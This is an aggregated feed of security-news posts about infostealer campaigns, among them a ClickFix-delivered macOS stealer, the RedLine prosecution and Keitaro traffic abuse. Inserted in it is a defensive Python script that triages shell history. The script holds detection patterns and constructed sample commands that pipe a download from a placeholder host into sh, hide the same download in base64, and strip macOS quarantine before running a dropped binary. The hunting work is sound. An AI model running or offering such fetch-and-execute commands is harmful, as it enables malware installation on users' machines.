Suspected #RedLine #infostealer #malware admin extradited to US
Infiniti Stealer: a new macOS infostealer using ClickFix and Python/Nuitka
A new macOS infostealer called Infiniti Stealer has been discovered, utilizing ClickFix delivery and Python/Nuitka compilation. The malware spreads through a fake CAPTCHA page, tricking users into running a command themselves. The final payload is a Python-based stealer compiled with Nuitka, making it harder to analyze and detect. The malware targets sensitive data including browser credentials, macOS Keychain entries, cryptocurrency wallets, and developer files. It employs anti-analysis techniques and exfiltrates data via HTTP POST requests. This campaign demonstrates the adaptation of Windows-based techniques to target Mac users and showcases the increasing sophistication of macOS malware.
Pulse ID: 69c65110c392e209625c97d5
Pulse Link: https://otx.alienvault.com/pulse/69c65110c392e209625c97d5
Pulse Author: AlienVault
Created: 2026-03-27 09:42:40
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#Browser #CAPTCHA #CyberSecurity #HTTP #InfoSec #InfoStealer #Mac #MacOS #Malware #OTX #OpenThreatExchange #Python #RAT #Windows #bot #cryptocurrency #AlienVault
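The ClickFix step described in that pulse (a fake CAPTCHA page that persuades the user to paste a command into Terminal) leaves a trace in shell history and process command lines. The script below is an added hunting example, not code from the pulse or from the underlying report: it triages command lines for fetch-and-execute one-liners, unwraps base64 blobs so a hidden `curl | sh` is still seen, and flags quarantine-flag removal on a dropped binary. The rule set and the sample history lines are constructed for illustration; `example.invalid` is a reserved name, not a real indicator.

```python
"""Heuristic triage of shell history / process command lines for
ClickFix-style one-liners. Added example; rules and samples are constructed."""
import base64
import re
from typing import Dict, List

# Hypothetical heuristics for illustration, not a vendor signature set.
# Each pattern is matched against the raw command and against any plaintext
# recovered from base64 blobs embedded in it.
RULES: Dict[str, re.Pattern] = {
    "download_then_execute": re.compile(
        r"\b(curl|wget)\b[^|;&]*(\||;|&&)\s*(sh|bash|zsh|python3?)\b"),
    "base64_decode_to_shell": re.compile(
        r"base64\s+(-d|--decode|-D)\b[^|]*\|\s*(sh|bash|zsh)\b"),
    "inline_python_fetch": re.compile(
        r"python3?\s+-c\s+['\"].*(urllib|requests|socket)"),
    "quarantine_bypass": re.compile(
        r"\bxattr\b.*(-c\b|com\.apple\.quarantine)"),
    "noisy_temp_drop": re.compile(
        r"/tmp/[^\s]+\s*(&&|;)\s*(chmod|open|sh|bash)\b"),
}

# Runs of base64 alphabet long enough to be worth decoding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def decode_embedded_base64(cmd: str) -> List[str]:
    """Return printable plaintexts of base64 tokens embedded in the command.
    Tokens that fail strict decoding or decode to binary are ignored."""
    found = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            raw = base64.b64decode(tok, validate=True)
        except ValueError:  # bad padding or non-base64 token
            continue
        text = raw.decode("utf-8", errors="ignore")
        if text and all(c.isprintable() or c in "\n\t" for c in text):
            found.append(text)
    return found


def triage_command(cmd: str) -> List[str]:
    """Names of rules that fire on the command or on anything it decodes to.
    An empty list means no ClickFix-style pattern was seen."""
    texts = [cmd] + decode_embedded_base64(cmd)
    return [name for name, rx in RULES.items() if any(rx.search(t) for t in texts)]


def triage_history(lines: List[str], min_hits: int = 1) -> List[Dict]:
    """Scan history lines; return 1-based line number, command and hits
    for every line that fires at least min_hits rules."""
    results = []
    for idx, cmd in enumerate(lines, start=1):
        hits = triage_command(cmd)
        if len(hits) >= min_hits:
            results.append({"line": idx, "command": cmd, "hits": hits})
    return results


# Constructed sample history: benign lines mixed with ClickFix-style ones.
SAMPLE_HISTORY = [
    "ls -la ~/Projects",
    "git pull origin main",
    # fetch a script and pipe it straight into sh
    'curl -fsSL "https://example.invalid/verify.sh" | sh',
    # the same fetch hidden inside a base64 blob that is decoded at run time
    "echo " + base64.b64encode(b"curl -s https://example.invalid/p | bash").decode()
    + " | base64 -d | sh",
    # strip the quarantine flag from a dropped binary, then run it
    "xattr -c /tmp/verify && chmod +x /tmp/verify && /tmp/verify",
    "brew upgrade",
]

if __name__ == "__main__":
    for r in triage_history(SAMPLE_HISTORY):
        print(f"line {r['line']}: {r['hits']}\n    {r['command']}")
```

Run it against `~/.zsh_history` (strip the `: timestamp:0;` prefix first) or against command lines pulled from EDR telemetry; the base64 unwrapping is what keeps the second sample from slipping past a plain `curl | sh` grep.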
New #TorgGrabber #infostealer #malware targets 728 #crypto wallets
We planned one report on Keitaro abuse, but we ran out of pages before we ran out of cases.
So here’s Part 2 of 3, a medley of threats that go well beyond AI‑investment scams.
Threat actors abuse Keitaro’s traffic distribution, cloaking, and rule engine to hide malicious landing pages behind geo and device-based filters. They stack bulletproof hosting and reverse proxies to add layers of indirection, making takedown and analysis harder. In this post, we share how we overcame this using multi‑protocol, multi‑vantage telemetry. We leveraged JA4+ web server fingerprints, DNS analytics, and Confiant’s visibility into advertising supply chain data to uncover Keitaro abuse and the delivery of malware downloaders, infostealers, weaponized RMMs, wallet drainer campaigns, scams, and email spam and advertising attack vectors.
If you hunt threats distributed via adtech, these indicators can be useful pivots. https://www.infoblox.com/blog/threat-intelligence/no-reach-no-risk-the-keitaro-abuse-in-modern-cybercrime-distribution/
#dns #threatintel #threatintelligence #cybercrime #cybersecurity #infosec #infoblox #infobloxthreatintel #scam #ai #keitaro #adtech #tds #trafficdistributionsystem #cloaker #cloaking #landscape #malvertising #infostealer #rmm #remotemonitoringmanagement #downloader #malware #spam #airdrop #cryptocurrency #ja4 #ja4_fingerprinting
If you want a stealer, all you need to do is ask nicely.
📢 Armenian national appears before a US court over the RedLine Infostealer malware
🏛️ Context
Source: The Cyber Express, published 26 March 2026.
📖 cyberveille: https://cyberveille.ch/posts/2026-03-26-un-ressortissant-armenien-presente-devant-un-tribunal-americain-pour-le-malware-redline-infostealer/
🌐 source: https://thecyberexpress.com/redline-infostealer-networks-second-defendant/
#Infostealer #RedLine #Cyberveille
🏛️ Context
The article reports the appearance before a US court in Austin, Texas of an Armenian national involved in a campaign linked to the RedLine Infostealer.
👤 Suspect
Nationality: Armenian
Place of appearance: court in Austin, Texas (United States)
Role: operator of, or participant in, a RedLine Infostealer campaign
This is the second defendant in the case (as the article's URL indicates).
🦠 Malware concerned
RedLine Infostealer: stealer-type malware known for stealing credentials, browser data, cryptocurrency wallets and other sensitive information from infected systems.
📰 Nature of the article
Specialist press article covering a US judicial action against an alleged operator of the RedLine Infostealer network. Its main purpose is to report on the prosecution of an actor involved in distributing or operating this malware.
PXA Stealer attacks are rising, with researchers reporting a 10% spike targeting financial firms. The malware uses phishing and Telegram to steal credentials and crypto data.
Read: https://hackread.com/financial-firms-rise-pxa-stealer-attacks/
#Trivy vulnerability scanner breach pushed #infostealer via #GitHub Actions
GhostClaw expands beyond npm: GitHub repositories and AI workflows deliver macOS infostealer
Pulse ID: 69c1bf4a476f34783a7c6937
Pulse Link: https://otx.alienvault.com/pulse/69c1bf4a476f34783a7c6937
Pulse Author: Tr1sa111
Created: 2026-03-23 22:31:38
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #GitHub #InfoSec #InfoStealer #Mac #MacOS #NPM #OTX #OpenThreatExchange #bot #Tr1sa111
Sophisticated macOS Infostealer known as MioLab
MioLab, also known as Nova, has surfaced as a highly sophisticated Malware-as-a-Service (MaaS) platform specifically targeting Apple users.
Pulse ID: 69c1af72ec1c62238c869b68
Pulse Link: https://otx.alienvault.com/pulse/69c1af72ec1c62238c869b68
Pulse Author: cryptocti
Created: 2026-03-23 21:24:02
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
#CyberSecurity #InfoSec #InfoStealer #MaaS #Mac #MacOS #Malware #MalwareAsAService #OTX #OpenThreatExchange #bot #cryptocti